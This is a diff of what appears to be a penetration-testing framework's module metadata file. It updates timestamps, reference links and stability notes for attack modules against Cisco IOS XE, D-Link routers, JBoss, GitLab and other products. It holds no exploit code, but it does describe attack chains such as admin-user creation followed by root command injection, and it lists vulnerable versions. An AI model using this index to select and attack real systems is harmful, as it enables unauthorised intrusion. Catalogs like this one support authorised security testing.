@@ -1761,7 +1779,7 @@
"references": [
"CVE-2023-20198",
"URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z",
- "URL-https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
+ "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
"URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml",
"URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/",
"URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/"
@@ -1785,7 +1803,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-11-06 11:40:22 +0000",
+ "mod_time": "2025-02-28 09:35:28 +0000",
"path": "/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb",
"is_install_path": true,
"ref_name": "admin/http/cisco_ios_xe_cli_exec_cve_2023_20198",
@@ -1796,37 +1814,31 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/cisco_ios_xe_os_exec_cve_2023_20273": {
"name": "Cisco IOX XE unauthenticated OS command execution",
"fullname": "auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2023-10-16",
"type": "auxiliary",
"author": [
"sfewer-r7"
],
- "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.\n\n This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,\n CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read\n back via the webserver. Finally the output file is deleted and the admin user is removed.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW",
+ "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.\n\n This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,\n CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read\n back via the webserver. Finally the output file is deleted and the admin user is removed.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n\n NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even\n though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.",
"references": [
"CVE-2023-20198",
"CVE-2023-20273",
"URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z",
- "URL-https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
+ "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
"URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml",
"URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/",
"URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/",
@@ -1851,7 +1863,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-11-06 11:40:22 +0000",
+ "mod_time": "2025-03-27 16:51:16 +0000",
"path": "/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb",
"is_install_path": true,
"ref_name": "admin/http/cisco_ios_xe_os_exec_cve_2023_20273",
@@ -1862,25 +1874,19 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/cisco_ssm_onprem_account": {
"name": "Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)",
"fullname": "auxiliary/admin/http/cisco_ssm_onprem_account",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2024-07-20",
"type": "auxiliary",
@@ -1913,7 +1919,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-09-23 14:16:26 +0000",
+ "mod_time": "2025-06-23 19:38:36 +0000",
"path": "/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb",
"is_install_path": true,
"ref_name": "admin/http/cisco_ssm_onprem_account",
@@ -1934,16 +1940,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/cnpilot_r_cmd_exec": {
"name": "Cambium cnPilot r200/r201 Command Execution as 'root'",
"fullname": "auxiliary/admin/http/cnpilot_r_cmd_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -1974,7 +1976,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_cmd_exec",
@@ -1982,19 +1984,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/cnpilot_r_fpt": {
"name": "Cambium cnPilot r200/r201 File Path Traversal",
"fullname": "auxiliary/admin/http/cnpilot_r_fpt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -2025,7 +2030,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_fpt",
@@ -2033,19 +2038,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/contentkeeper_fileaccess": {
"name": "ContentKeeper Web Appliance mimencode File Access",
"fullname": "auxiliary/admin/http/contentkeeper_fileaccess",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -2076,7 +2084,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/http/contentkeeper_fileaccess",
@@ -2084,19 +2092,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/dlink_dir_300_600_exec_noauth": {
"name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution",
"fullname": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-02-04",
"type": "auxiliary",
@@ -2130,7 +2141,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
@@ -2138,19 +2149,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/dlink_dir_645_password_extractor": {
"name": "D-Link DIR 645 Password Extractor",
"fullname": "auxiliary/admin/http/dlink_dir_645_password_extractor",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -2183,7 +2197,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_645_password_extractor",
@@ -2191,19 +2205,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/dlink_dsl320b_password_extractor": {
"name": "D-Link DSL 320B Password Extractor",
"fullname": "auxiliary/admin/http/dlink_dsl320b_password_extractor",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -2235,7 +2252,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dsl320b_password_extractor",
@@ -2243,19 +2260,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/foreman_openstack_satellite_priv_esc": {
"name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",
"fullname": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-06-06",
"type": "auxiliary",
@@ -2290,7 +2310,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/foreman_openstack_satellite_priv_esc",
@@ -2298,19 +2318,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": {
"name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)",
"fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2024-06-25",
"type": "auxiliary",
@@ -2364,16 +2388,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/gitlab_password_reset_account_takeover": {
"name": "GitLab Password Reset Account Takeover",
"fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2024-01-11",
"type": "auxiliary",
@@ -2406,7 +2426,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-27 07:44:11 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb",
"is_install_path": true,
"ref_name": "admin/http/gitlab_password_reset_account_takeover",
@@ -2414,19 +2434,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/gitstack_rest": {
"name": "GitStack Unauthenticated REST API Requests",
"fullname": "auxiliary/admin/http/gitstack_rest",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-01-15",
"type": "auxiliary",
@@ -2459,7 +2483,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/gitstack_rest.rb",
"is_install_path": true,
"ref_name": "admin/http/gitstack_rest",
@@ -2467,6 +2491,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -2492,9 +2524,7 @@
"auxiliary_admin/http/grafana_auth_bypass": {
"name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth",
"fullname": "auxiliary/admin/http/grafana_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2019-08-14",
"type": "auxiliary",
@@ -2510,12 +2540,8 @@
"platform": "",
"arch": "",
"rport": 3000,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2022-09-29 01:28:56 +0000",
"path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py",
@@ -2524,20 +2550,15 @@
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/hikvision_unauth_pwd_reset_cve_2017_7921": {
"name": "Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic",
"fullname": "auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-09-23",
"type": "auxiliary",
@@ -2592,16 +2613,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/hp_web_jetadmin_exec": {
"name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution",
"fullname": "auxiliary/admin/http/hp_web_jetadmin_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-04-27",
"type": "auxiliary",
@@ -2633,7 +2650,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/hp_web_jetadmin_exec",
@@ -2641,19 +2658,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/ibm_drm_download": {
"name": "IBM Data Risk Manager Arbitrary File Download",
"fullname": "auxiliary/admin/http/ibm_drm_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-04-21",
"type": "auxiliary",
@@ -2695,9 +2715,7 @@
"post_auth": false,
"default_credential": false,
"notes": {
- "Reliability": [
-
- ],
+ "Reliability": [],
"Stability": [
"crash-safe"
],
@@ -2718,9 +2736,7 @@
"auxiliary_admin/http/idsecure_auth_bypass": {
"name": "Control iD iDSecure Authentication Bypass (CVE-2023-6329)",
"fullname": "auxiliary/admin/http/idsecure_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2023-11-27",
"type": "auxiliary",
@@ -2752,7 +2768,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-08-19 21:17:16 +0000",
+ "mod_time": "2025-06-23 19:38:36 +0000",
"path": "/modules/auxiliary/admin/http/idsecure_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/idsecure_auth_bypass",
@@ -2773,16 +2789,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/iis_auth_bypass": {
"name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",
"fullname": "auxiliary/admin/http/iis_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-07-02",
"type": "auxiliary",
@@ -2816,7 +2828,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/iis_auth_bypass",
@@ -2824,19 +2836,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/intersil_pass_reset": {
"name": "Intersil (Boa) HTTPd Basic Authentication Password Reset",
"fullname": "auxiliary/admin/http/intersil_pass_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-09-10",
"type": "auxiliary",
@@ -2870,7 +2885,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/intersil_pass_reset",
@@ -2878,19 +2893,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/iomega_storcenterpro_sessionid": {
"name": "Iomega StorCenter Pro NAS Web Authentication Bypass",
"fullname": "auxiliary/admin/http/iomega_storcenterpro_sessionid",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -2921,7 +2940,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb",
"is_install_path": true,
"ref_name": "admin/http/iomega_storcenterpro_sessionid",
@@ -2929,19 +2948,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/ivanti_vtm_admin": {
"name": "Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)",
"fullname": "auxiliary/admin/http/ivanti_vtm_admin",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2024-08-05",
"type": "auxiliary",
@@ -2975,7 +2997,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-08-16 15:43:34 +0000",
+ "mod_time": "2025-06-23 19:38:36 +0000",
"path": "/modules/auxiliary/admin/http/ivanti_vtm_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/ivanti_vtm_admin",
@@ -2996,16 +3018,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/jboss_bshdeployer": {
"name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",
"fullname": "auxiliary/admin/http/jboss_bshdeployer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -3038,7 +3056,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_bshdeployer",
@@ -3046,6 +3064,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -3063,9 +3090,7 @@
"auxiliary_admin/http/jboss_deploymentfilerepository": {
"name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment",
"fullname": "auxiliary/admin/http/jboss_deploymentfilerepository",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -3098,7 +3123,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_deploymentfilerepository",
@@ -3106,6 +3131,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -3123,9 +3157,7 @@
"auxiliary_admin/http/jboss_seam_exec": {
"name": "JBoss Seam 2 Remote Command Execution",
"fullname": "auxiliary/admin/http/jboss_seam_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-07-19",
"type": "auxiliary",
@@ -3157,7 +3189,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_seam_exec",
@@ -3165,19 +3197,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/joomla_registration_privesc": {
"name": "Joomla Account Creation and Privilege Escalation",
"fullname": "auxiliary/admin/http/joomla_registration_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-10-25",
